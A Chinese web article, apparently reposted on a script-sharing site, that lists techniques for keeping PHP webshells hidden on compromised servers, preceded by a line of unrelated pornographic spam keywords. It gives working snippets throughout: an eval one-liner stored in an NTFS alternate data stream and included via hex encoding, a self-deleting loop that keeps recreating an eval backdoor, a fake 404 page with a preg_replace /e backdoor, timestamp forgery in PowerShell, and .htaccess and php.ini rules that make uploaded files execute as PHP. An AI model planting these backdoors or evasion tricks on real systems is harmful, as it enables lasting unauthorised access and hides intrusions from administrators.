欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

PHP后門隱藏的一些技巧總結(jié)

 更新時間:2020年11月04日 09:11:01   作者:Bypass  
這篇文章主要介紹了關(guān)于PHP后門隱藏的一些技巧,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

前言

如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏文件,修改時間屬性,隱藏文件內(nèi)容等。

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創(chuàng)建的文件,那么,除了創(chuàng)建一個迷惑性的文件名,還需要修改文件的修改日期。

//修改時間修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//訪問時間修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//創(chuàng)建時間修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個文件夾下所有文件的創(chuàng)建和修改時間

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內(nèi)容

在服務(wù)器上echo一個數(shù)據(jù)流文件進去,比如index.php是網(wǎng)頁正常文件,我們可以這樣子搞:

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

這樣子就生成了一個不可見的shell hidden.jpg,常規(guī)的文件管理器、type命令,dir命令、del命令發(fā)現(xiàn)都找不出那個hidden.jpg的。

利用include函數(shù),將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死馬

不死馬會刪除自身,以進程的形式循環(huán)創(chuàng)建隱蔽的后門。

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //刪除自身
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //創(chuàng)建shell.php,這里最好用免殺的一句話
 sleep(10); //間隔時間
}
?>

處理方式最簡單有效的辦法,就是重啟服務(wù)就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復制到modules文件夾,啟動后門模塊,重啟Apache。當發(fā)送特定參數(shù)的字符串過去時,即可觸發(fā)后門。

github項目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁面隱藏后門

404頁面主要用來提升用戶體驗,可用來隱藏后門文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件構(gòu)成PHP后門

一般.htaccess可以用來留后門和針對黑名單繞過,在上傳目錄創(chuàng)建.htaccess 文件寫入,無需重啟即可生效,上傳png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規(guī)則,把文件名包含1的解析成php,上傳1.txt即可解析。

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執(zhí)行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。

;在PHP文檔之前自動添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文檔之后自動添加文件。
auto_prepend_file = "c:\tmp.txt"

需重啟服務(wù)生效,訪問任意一個php文件即可獲取webshell。

總結(jié)

到此這篇關(guān)于PHP后門隱藏的一些技巧的文章就介紹到這了,更多相關(guān)PHP后門隱藏技巧內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • 一鍵生成各種尺寸Icon的php腳本(實例)

    一鍵生成各種尺寸Icon的php腳本(實例)

    下面小編就為大家?guī)硪黄绘I生成各種尺寸Icon的php腳本(實例)。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧
    2017-02-02
  • 淺談php安全性需要注意的幾點事項

    淺談php安全性需要注意的幾點事項

    這段時間一直在寫一個整站,前幾天才基本完成了,所以抽個時間寫了一篇對于php安全的總結(jié)。技術(shù)含量不高,過不了也沒關(guān)系,希望能一些準備寫網(wǎng)站的朋友一點引導。
    2014-07-07
  • 在PHP里得到前天和昨天的日期的代碼

    在PHP里得到前天和昨天的日期的代碼

    在PHP里得到前天和昨天的日期的代碼...
    2007-08-08
  • PHP入門教程之正則表達式基本用法實例詳解(正則匹配,搜索,分割等)

    PHP入門教程之正則表達式基本用法實例詳解(正則匹配,搜索,分割等)

    這篇文章主要介紹了PHP入門教程之正則表達式基本用法,結(jié)合實例形式分析了正則表達式的結(jié)構(gòu)、原理及正則匹配、搜索、分割、元子符、修飾符等相關(guān)概念與操作技巧,需要的朋友可以參考下
    2016-09-09
  • PHP基于遞歸算法解決兔子生兔子問題

    PHP基于遞歸算法解決兔子生兔子問題

    這篇文章主要介紹了PHP基于遞歸算法解決兔子生兔子問題,結(jié)合實例形式分析了兔子生兔子問題的php面試題采用循環(huán)與遞歸兩種思路的解決方法,需要的朋友可以參考下
    2018-05-05
  • 防止用戶利用PHP代碼DOS造成用光網(wǎng)絡(luò)帶寬

    防止用戶利用PHP代碼DOS造成用光網(wǎng)絡(luò)帶寬

    一打開IIS,服務(wù)器的流出帶寬就用光-----就是說服務(wù)器不斷向別人發(fā)包,這個情況和受到DDOS攻擊是不同的,DDOS是不斷收到大量數(shù)據(jù)包.
    2011-03-03
  • PHP巧妙利用位運算實現(xiàn)網(wǎng)站權(quán)限管理的方法

    PHP巧妙利用位運算實現(xiàn)網(wǎng)站權(quán)限管理的方法

    下面小編就為大家?guī)硪黄狿HP巧妙利用位運算實現(xiàn)網(wǎng)站權(quán)限管理的方法。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧
    2017-03-03
  • IIS7.X配置PHP運行環(huán)境小結(jié)

    IIS7.X配置PHP運行環(huán)境小結(jié)

    很久沒有接觸過php的東西了,今天有個程序需要一個php的運行環(huán)境。由于只需要簡單的跑一下程序,因此覺得沒有必要弄一個LAMP的環(huán)境(如果需要配LAMP環(huán)境的話可以參考我寫的關(guān)于PHP的blog),不如直接用IIS來運行吧。
    2011-06-06
  • 再推薦十款免費的php開發(fā)工具

    再推薦十款免費的php開發(fā)工具

    這篇文章再向朋友們推薦十款免費的php開發(fā)工具,一個好的編輯器或開發(fā)工具,能夠極大提高我們的開發(fā)效率,需要的朋友可以參考下
    2015-11-11
  • php逐行讀取txt文件寫入數(shù)組的方法

    php逐行讀取txt文件寫入數(shù)組的方法

    這篇文章主要介紹了php逐行讀取txt文件寫入數(shù)組的方法,涉及php文本文件及數(shù)組的相關(guān)操作技巧,需要的朋友可以參考下
    2015-07-07

最新評論